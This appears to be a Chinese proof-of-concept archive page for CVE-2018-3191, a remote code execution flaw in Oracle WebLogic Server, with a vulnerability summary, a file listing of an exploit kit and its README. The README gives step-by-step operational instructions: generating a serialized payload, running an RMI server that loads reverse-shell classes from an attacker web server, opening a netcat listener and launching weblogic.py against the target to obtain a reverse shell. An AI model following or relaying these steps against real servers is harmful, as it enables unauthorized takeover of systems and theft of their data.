关联漏洞
标题:Oracle Fusion Middleware WebLogic Server组件安全漏洞 (CVE-2018-3191)Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Oracle Fusion Middleware中的WebLogic Server组件10.3.6.0版本、12.1.3.0版本和12.2.1.3版本的WLS Core Components子组件存在安全漏洞。攻击者可利用该漏洞控制组件,影响数据
介绍
# CVE-2018-3191-Rce-Exploit
## Author: Break
## Step 1: java -jar GenPayload.java output SJpayload.bin, Address is RMI Server address
## Step 2:java -jar RMISERVER.jar httpaddress, RMI server listening on port 1099 and load remote Reverse classes on web server
## Step 3:put two files(reverse shell) LoadObject.class and StreamConnection.class on http server and can be visited by url
## Step 4: nc -llp 2222
## Step 5: python weblogic.py weblogicAddress 7001 SJpayload
## Step 6: wait for a reverse shell, good luck
文件快照
[4.0K] /data/pocs/43d4988f384d93df5e6557cfe6291a09d92e7034
├── [2.3M] GenPayload.jar
├── [4.0K] out
│ ├── [4.0K] artifacts
│ │ └── [4.0K] WeblogicSpringJdni_jar
│ │ └── [1.8M] WeblogicSpringJdni.jar
│ └── [4.0K] production
│ └── [4.0K] WeblogicSpringJdni
│ ├── [1.5K] GenSpringJdniPayload.class
│ ├── [1.3K] JNDIServer.class
│ ├── [1.7K] LoadObject.class
│ ├── [4.0K] META-INF
│ │ └── [ 49] MANIFEST.MF
│ └── [1.3K] StreamConnector.class
├── [ 526] README.md
├── [2.3M] RMISERVER.jar
├── [4.0K] src
│ ├── [ 796] GenSpringJdniPayload.java
│ ├── [ 778] JNDIServer.java
│ ├── [1.2K] LoadObject.java
│ ├── [4.0K] META-INF
│ │ └── [ 49] MANIFEST.MF
│ └── [1012] StreamConnector.java
└── [5.1K] weblogic.py
8 directories, 15 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。